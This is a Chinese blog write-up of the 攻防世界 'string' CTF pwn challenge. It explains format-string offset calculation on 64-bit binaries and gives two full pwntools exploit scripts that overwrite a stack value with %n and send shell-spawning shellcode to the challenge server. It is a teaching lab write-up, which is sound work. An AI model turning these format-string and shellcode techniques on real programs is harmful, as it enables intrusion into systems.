



<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="清風微醺" href="https://www.wdqjxtmph.top/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="清風微醺" href="https://www.wdqjxtmph.top/atom.xml" />
<link rel="alternate" type="application/json" title="清風微醺" href="https://www.wdqjxtmph.top/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  
  <meta name="keywords" content="pwn题" />


<link rel="canonical" href="https://www.wdqjxtmph.top/2021/08/20/string/">



  <title>
攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解 - CTF |
Nirvana = 清風微醺 = 凌恒</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解
  </h1>
  
<div class="meta">
  <span class="item" title="创建时间：2021-08-20 21:32:39">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">发表于</span>
    <time itemprop="dateCreated datePublished" datetime="2021-08-20T21:32:39+08:00">2021-08-20</time>
  </span>
  <span class="item" title="本文字数">
    <span class="icon">
      <i class="ic i-pen"></i>
    </span>
    <span class="text">本文字数</span>
    <span>4.7k</span>
    <span class="text">字</span>
  </span>
  <span class="item" title="阅读时长">
    <span class="icon">
      <i class="ic i-clock"></i>
    </span>
    <span class="text">阅读时长</span>
    <span>4 分钟</span>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="切换导航栏">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Nirvana</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giciryrr3rj20zk0m8nhk.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gipeybxm1pj20zk0m8niv.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gicis3attqj20zk0m8k7l.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gicit4jrvuj20zk0m8785.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1giclimtf7dj20zk0m8qav.jpg"></li>
          <li class="item" data-background-image="https://tva3.sinaimg.cn/large/6833939bly1gipev1x5e4j20zk0m8b29.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">首页</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/CTF/" itemprop="item" rel="index" title="分类于 CTF"><span itemprop="name">CTF</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="zh-CN">
  <link itemprop="mainEntityOfPage" href="https://www.wdqjxtmph.top/2021/08/20/string/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="invincible">
    <meta itemprop="description" content="凌恒, 凌恒山其若陋兮、">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="清風微醺">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <p>攻防世界 string 应该是新手区数一数二的难题，难点在理解程序流程。</p>
<p>先观察主函数:</p>
<p><img data-src="https://tva3.sinaimg.cn/large/008qDYGVgy1gwf4d3eaoij30ov0a80xo.jpg" alt="1"></p>
<h1 id="alarm函数"><a class="markdownIt-Anchor" href="#alarm函数">#</a> alarm 函数</h1>
<h2 id="什么是alarm函数"><a class="markdownIt-Anchor" href="#什么是alarm函数">#</a> 什么是 alarm 函数？</h2>
<p>如上图所示，在做一些 pwn 题的时候，我们有时会遇到 <code>alarm(0x3Cu)</code>  函数。alarm 函数中的参数 <code>0x3Cu</code>  是十六进制无符号数，即十进制对应 60，所以该函数的作用是在程序运行 60 秒后，给进程发送 SIGALRM 信号，如果不另编写程序接受处理此信号，则默认结束此程序。</p>
<h2 id="为什么要使用alarm函数"><a class="markdownIt-Anchor" href="#为什么要使用alarm函数">#</a> 为什么要使用 alarm 函数？</h2>
<p>一是比赛中常要远程连接服务器解题，官方不希望有队伍长时间解不出来题浪费服务器资源</p>
<p>二是能对动态调试产生一定影响，干扰选手解题</p>
<h2 id="关闭alarm函数的方法"><a class="markdownIt-Anchor" href="#关闭alarm函数的方法">#</a> 关闭 alarm 函数的方法</h2>
<p>在命令行里：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 将程序名为ProgrammName中的alarm替换为isnan</span><br><span class="line">&gt; sed -i s/alarm/isnan/g ./ProgrammName</span><br></pre></td></tr></table></figure>
<p>不过这道题 alarm 函数对于程序影响不大，可以不用关闭。</p>
<h1 id="程序流程"><a class="markdownIt-Anchor" href="#程序流程">#</a> 程序流程</h1>
<p><img data-src="https://tva3.sinaimg.cn/large/008qDYGVgy1gwf4d3eaoij30ov0a80xo.jpg" alt="1"></p>
<p>如图，系统分配内存给 v4,v4 数组里的内容分别是 68 和 85。</p>
<p>main 函数中重点关注</p>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwf4dm8s1lj309s013mxm.jpg" alt="2"></p>
<p>程序把 v4 和 v4+1 的地址给泄露出来了。</p>
<p>程序继续进入 sub_400D72 ()，提示输入 name 后进入 sub_400A7D ()，这里不再赘述，不选择 east 和 1 就会被干掉。</p>
<p>选择 east 和 1 后我们进入 sub_400BB9 ()</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwf4f7xp2sj30on0eg45o.jpg" alt="4"></p>
<p>这里发现格式化字符串漏洞。</p>
<p>最后进入 sub_400CA6 ()</p>
<p><img data-src="https://tva4.sinaimg.cn/large/008qDYGVgy1gwf4fd2wbrj30m00b5453.jpg" alt="5"></p>
<p>发现若 a1 [0] 等于 a1 [1]，就可将 v1 变成可执行函数</p>
<p>（mmap 是一种内存映射文件的方法)，可通过 read 函数读入一串机器码，然后运行，这相当于是把 shellcode 送你脸上来了。</p>
<p>#综合分析</p>
<h2 id="shellcode"><a class="markdownIt-Anchor" href="#shellcode">#</a> shellcode</h2>
<p>我们的目的是拿到 flag，此题中没有 system 函数，因此需要通过 shellcode 得到 flag，而在 sub_400CA6 () 中可以执行 shellcode。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shellcode =asm(shellcraft.sh()) </span><br><span class="line">r.send(shellcode)</span><br></pre></td></tr></table></figure>
<p>但是这几句有些时候会出错，在 from pwn import * 后加入如下语句则不会出错。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br></pre></td></tr></table></figure>
<h2 id="shellcode的条件"><a class="markdownIt-Anchor" href="#shellcode的条件">#</a> shellcode 的条件</h2>
<p>在程序流程中我们分析到了，必须满足 a1 [0]=a1 [1] 才能进行 shellcode，因此我们接下来的目标就是让这两个值相等。sub_400CA6 () 中传入了 a 指针参数，因此 a1 [0],a1 [1] 其实就是 v4 [0] 和 v4 [1], 传递过程是通过 sub_400D72 传入到 sub_400CA6 ()。</p>
<p>那么我们接下来的任务就是让 v4 [0]=v4 [1]。</p>
<p>在分析程序流程时我们提到过，程序在 main 函数里泄露过 v4 的地址，而程序又在 sub_400BB9 () 中存在格式化字符漏洞，那我们就可以得到 v4 地址后将 v4 [0] 的值通过格式化字符串漏洞改为和 v4 [1] 相等</p>
<p>1. 得到 v4 的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">r.recvuntil(<span class="string">&quot;secret[0] is &quot;</span>)</span><br><span class="line">addr = <span class="built_in">int</span>(r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>],<span class="number">16</span>)</span><br></pre></td></tr></table></figure>
<p>知识点 1：int (x,y) 是将 x 转换成 y 进制的数，如上就是将收到的值转换成 16 进制</p>
<p>知识点 2：[:-1] 为 python 切片知识，自行百度。</p>
<p>2. 通过 % n 改写 v4 [0] 的值</p>
<p>在此之前我们先说说 % n，% n 的作用不是输出值，而是将一个值写进一个变量或一个地址。</p>
<h3 id="什么是偏移"><a class="markdownIt-Anchor" href="#什么是偏移">#</a> 什么是偏移</h3>
<p>偏移的理解借助另一个博客的文章：</p>
<p>拿改栈上一个参数的值为例，更改我们的输入<br>
我起初不懂为什么会有这个偏移，看 wiki 说的我以为是简单的入栈顺序造成的，后来看了这个才知道为什么有这个偏移，简单来说就是，例如</p>
<p>char a[100];<br>
scanf(&quot;%s&quot;,a);<br>
printf(a);<br>
 这里输入 a 时是把栈上 a 的值给替换成输入的值，这个栈指的是 main 函数的栈，因为 a 是 mian 函数的局部变量，然后就又有 printf 函数的调用，这时 printf 函数的栈在 a 栈桢的上面，然后 printf 入栈的参数是 a 的地址，在这里就有了偏移，我们要改的不是 printf 入栈的那个参数，那个只是地址，改了之后只是不对应 a 了，对 a 真正的值没影响，我们要改的是 a，也就是在这个函数的栈里去修改别的函数的栈的内容，我们要计算 printf 函数入参的那个栈桢相较 a 变量存的栈桢的差，这是偏移的原因</p>
<p>原文链接：[<span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3Nsc194c2wvYXJ0aWNsZS9kZXRhaWxzLzExMzc5ODA5Nw==">https://blog.csdn.net/sls_xsl/article/details/113798097</span>]</p>
<h3 id="我们要做什么"><a class="markdownIt-Anchor" href="#我们要做什么">#</a> 我们要做什么</h3>
<p>实际上我们要做的事就是往栈里写进一个地址，这个地址就是我们要改变的变量的值的地址，然后找到这个地址在栈中的偏移量，然后利用 % a<span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>n</mi><mtext>来改变值。</mtext><mo stretchy="false">(</mo><mtext>其中</mtext><mi>a</mi><mtext>是偏移量</mtext><mo stretchy="false">)</mo><mtext>通常情况下我们采用</mtext><mi>a</mi><mi>d</mi><mi>d</mi><mi>r</mi><mo>+</mo></mrow><annotation encoding="application/x-tex">n来改变值。(其中a是偏移量)通常情况下我们采用addr+%a</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord mathnormal">n</span><span class="mord cjk_fallback">来</span><span class="mord cjk_fallback">改</span><span class="mord cjk_fallback">变</span><span class="mord cjk_fallback">值</span><span class="mord cjk_fallback">。</span><span class="mopen">(</span><span class="mord cjk_fallback">其</span><span class="mord cjk_fallback">中</span><span class="mord mathnormal">a</span><span class="mord cjk_fallback">是</span><span class="mord cjk_fallback">偏</span><span class="mord cjk_fallback">移</span><span class="mord cjk_fallback">量</span><span class="mclose">)</span><span class="mord cjk_fallback">通</span><span class="mord cjk_fallback">常</span><span class="mord cjk_fallback">情</span><span class="mord cjk_fallback">况</span><span class="mord cjk_fallback">下</span><span class="mord cjk_fallback">我</span><span class="mord cjk_fallback">们</span><span class="mord cjk_fallback">采</span><span class="mord cjk_fallback">用</span><span class="mord mathnormal">a</span><span class="mord mathnormal">d</span><span class="mord mathnormal">d</span><span class="mord mathnormal" style="margin-right:0.02778em;">r</span><span class="mord">+</span></span></span></span>n 或者 % a$n+addr 的方式去利用格式化字符漏洞，地址写在前面或后面，偏移量也会不同。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">**注意！！！！！这道题是64位程序，64位程序由于字长为8，64位程序的地址存在零，所以想要利用偏移来泄露地址内容或者改写其内容的话，目的地址不能放在格式化符号之前，否则printf在遇到零字节时会被截断，此时应将目的地址放在格式化符号后面。**</span><br></pre></td></tr></table></figure>
<p>同时如果要把地址防格式化符号后面，要注意堆栈内容对齐，也就是说我们要在 % an$b 和 addr 的中间填充适当字符来使字符总量能被 8 整除。这样在取偏移量的时候才能使偏移量为整数时，取到我们所需要的地址。</p>
<h3 id="偏移量的确定"><a class="markdownIt-Anchor" href="#偏移量的确定">#</a> 偏移量的确定</h3>
<p>方法一：gdb 调试。</p>
<p>方法二：输入 aaaaaaaa-% p-% p-% p-% p-% p-% p</p>
<p>注意：64 位程序不能用 % x 来确定偏移量，且 64 位程序需要输入 aaaaaaaa 而不是 aaaa</p>
<p><strong>利用 % x 来获取对应栈的内存，但建议使用 % p，可以不用考虑位数的区别。–转自 ctf-wiki</strong></p>
<p><img data-src="https://tvax2.sinaimg.cn/large/008qDYGVgy1gwf4fiixrwj30ka032413.jpg" alt="6"></p>
<p>如图 0x6161616161616161 即为我们输入 aaaaaaaa 的十六进制值，也就是说 print 栈中第一个参数的偏移为 8.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload =<span class="string">&#x27;b&#x27;</span>*<span class="number">85</span>+<span class="string">&#x27;%20$n&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">6</span>+p64(addr).decode(<span class="string">&#x27;unicode_escape&#x27;</span>)</span><br></pre></td></tr></table></figure>
<p>其中 b 乘 85 是我们需要 v4 [0] 变成的值，a 乘 6 为填充字符来使堆栈内容对齐，计算一下地址前面共有 96 个字符（%20$n 算五个字符，这里博主因为这个检查了快一个小时），偏移量就应该加上 96/8=12，故最后的偏移量为 20。</p>
<p>完整 exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">r = remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">49213</span>)</span><br><span class="line"><span class="comment">#r = process(&#x27;./stRing&#x27;)</span></span><br><span class="line">r.recvuntil(<span class="string">&quot;secret[0] is &quot;</span>)</span><br><span class="line">addr = <span class="built_in">int</span>(r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>],<span class="number">16</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;What should your character&#x27;s name be:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;invincible&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;So, where you will go?east or up?&quot;</span>)</span><br><span class="line">a = r.recvuntil(<span class="string">&quot;:&quot;</span>)[:-<span class="number">1</span>]</span><br><span class="line">r.sendline(<span class="string">&#x27;east&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;go into there(1), or leave(0)?:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;&#x27;Give me an address&#x27;&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;1111&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;And, you wish is:&quot;</span>)</span><br><span class="line">payload =<span class="string">&#x27;b&#x27;</span>*<span class="number">85</span>+<span class="string">&#x27;%20$n&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">6</span>+p64(addr).decode(<span class="string">&#x27;unicode_escape&#x27;</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Wizard: I will help you! USE YOU SPELL&quot;</span>)</span><br><span class="line">shellcode =asm(shellcraft.sh()) </span><br><span class="line">r.send(shellcode)</span><br><span class="line">r.interactive() </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>last：记得把文件名改成 stRing，由于 string 是关键字，运行时可能会出错。</p>
<h2 id="解法二更简单的解法"><a class="markdownIt-Anchor" href="#解法二更简单的解法">#</a> 解法二：更简单的解法</h2>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwf4f7xp2sj30on0eg45o.jpg" alt="4"></p>
<p>如图，程序中有一段：give me an address，这其实就给我们提示了，v2 是调用 print 前的最后一个参数，也就是说它在程序中的偏移量是 printf 第一个参数的偏移量减一。我们可以验证一下</p>
<p><img data-src="https://tva3.sinaimg.cn/large/008qDYGVgy1gwf4fwze8qj30kh03kmzh.jpg" alt="7"></p>
<p>如图我们输入的 1111 的十六进制即为 0x457，偏移量为 7。</p>
<p>完整 exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>, os=<span class="string">&#x27;linux&#x27;</span>, log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line">r = remote(<span class="string">&quot;111.200.241.244&quot;</span>,<span class="number">57932</span>)</span><br><span class="line"><span class="comment">#r = process(&#x27;./string&#x27;)</span></span><br><span class="line">r.recvuntil(<span class="string">&quot;secret[0] is &quot;</span>)</span><br><span class="line">addr = <span class="built_in">int</span>(r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>],<span class="number">16</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;What should your character&#x27;s name be:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;invincible&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;So, where you will go?east or up?:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;east&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;go into there(1), or leave(0)?:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;&#x27;Give me an address&#x27;&quot;</span>)</span><br><span class="line">r.sendline(<span class="built_in">str</span>(addr))</span><br><span class="line">r.recvuntil(<span class="string">&quot;And, you wish is:&quot;</span>)</span><br><span class="line">payload =<span class="string">&#x27;b&#x27;</span>*<span class="number">85</span>+<span class="string">&#x27;%7$n&#x27;</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Wizard: I will help you! USE YOU SPELL&quot;</span>)</span><br><span class="line">shellcode =asm(shellcraft.sh()) </span><br><span class="line">r.send(shellcode)</span><br><span class="line">r.interactive() </span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/pwn%E9%A2%98/" rel="tag"><i class="ic i-tag"></i> pwn题</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2021-11-15 00:00:54" itemprop="dateModified" datetime="2021-11-15T00:00:54+08:00">2021-11-15</time>
  </span>
  <span id="2021/08/20/string/" class="item leancloud_visitors" data-flag-title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="invincible 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="invincible 支付宝">
        <p>支付宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>invincible <i class="ic i-at"><em>@</em></i>清風微醺
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://www.wdqjxtmph.top/2021/08/20/string/" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">https://www.wdqjxtmph.top/2021/08/20/string/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
    </div>
    <div class="item right">
      

  <a href="/2021/09/03/babyrop/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva3.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gicli3sbvtj20zk0m8x6p.jpg" title="标准32位程序ROP流程和c语言转义字符">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTF</span>
  <h3>标准32位程序ROP流程和c语言转义字符</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#alarm%E5%87%BD%E6%95%B0"><span class="toc-number">1.</span> <span class="toc-text"> alarm 函数</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AFalarm%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.</span> <span class="toc-text"> 什么是 alarm 函数？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E4%BD%BF%E7%94%A8alarm%E5%87%BD%E6%95%B0"><span class="toc-number">1.2.</span> <span class="toc-text"> 为什么要使用 alarm 函数？</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B3%E9%97%ADalarm%E5%87%BD%E6%95%B0%E7%9A%84%E6%96%B9%E6%B3%95"><span class="toc-number">1.3.</span> <span class="toc-text"> 关闭 alarm 函数的方法</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E6%B5%81%E7%A8%8B"><span class="toc-number">2.</span> <span class="toc-text"> 程序流程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#shellcode"><span class="toc-number">2.1.</span> <span class="toc-text"> shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#shellcode%E7%9A%84%E6%9D%A1%E4%BB%B6"><span class="toc-number">2.2.</span> <span class="toc-text"> shellcode 的条件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%81%8F%E7%A7%BB"><span class="toc-number">2.2.1.</span> <span class="toc-text"> 什么是偏移</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%88%91%E4%BB%AC%E8%A6%81%E5%81%9A%E4%BB%80%E4%B9%88"><span class="toc-number">2.2.2.</span> <span class="toc-text"> 我们要做什么</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%81%8F%E7%A7%BB%E9%87%8F%E7%9A%84%E7%A1%AE%E5%AE%9A"><span class="toc-number">2.2.3.</span> <span class="toc-text"> 偏移量的确定</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E6%B3%95%E4%BA%8C%E6%9B%B4%E7%AE%80%E5%8D%95%E7%9A%84%E8%A7%A3%E6%B3%95"><span class="toc-number">2.3.</span> <span class="toc-text"> 解法二：更简单的解法</span></a></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li class="active"><a href="/2021/08/20/string/" rel="bookmark" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</a></li><li><a href="/2021/09/03/babyrop/" rel="bookmark" title="标准32位程序ROP流程和c语言转义字符">标准32位程序ROP流程和c语言转义字符</a></li><li><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" rel="bookmark" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></li><li><a href="/2021/09/09/64%E4%BD%8D%E6%A0%87%E5%87%86ROP%E4%B8%8E%E5%A0%86%E6%A0%88%E5%B9%B3%E8%A1%A1/" rel="bookmark" title="标准64位程序ROP流程和堆栈平衡">标准64位程序ROP流程和堆栈平衡</a></li><li><a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" rel="bookmark" title="电科新生赛">电科新生赛</a></li><li><a href="/2021/11/14/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-format_string/" rel="bookmark" title="格式化字符串漏洞进阶">格式化字符串漏洞进阶</a></li><li><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" rel="bookmark" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></li><li><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" rel="bookmark" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></li><li><a href="/2022/03/13/Tcache%20bin%E6%80%BB%E7%BB%93/" rel="bookmark" title="Tcachebin 总结">Tcachebin 总结</a></li><li><a href="/2022/04/06/wustctf2020_babyfmt/" rel="bookmark" title="wustctf2020_babyfmt">wustctf2020_babyfmt</a></li><li><a href="/2022/07/11/2022%E8%93%9D%E5%B8%BDpwn%20wp/" rel="bookmark" title="2022蓝帽pwn wp">2022蓝帽pwn wp</a></li><li><a href="/2022/07/15/DSCTF%E9%83%A8%E5%88%86wp/" rel="bookmark" title="DSCTF pwn 部分wp">DSCTF pwn 部分wp</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="invincible"
      data-src="/images/avatar.jpg">
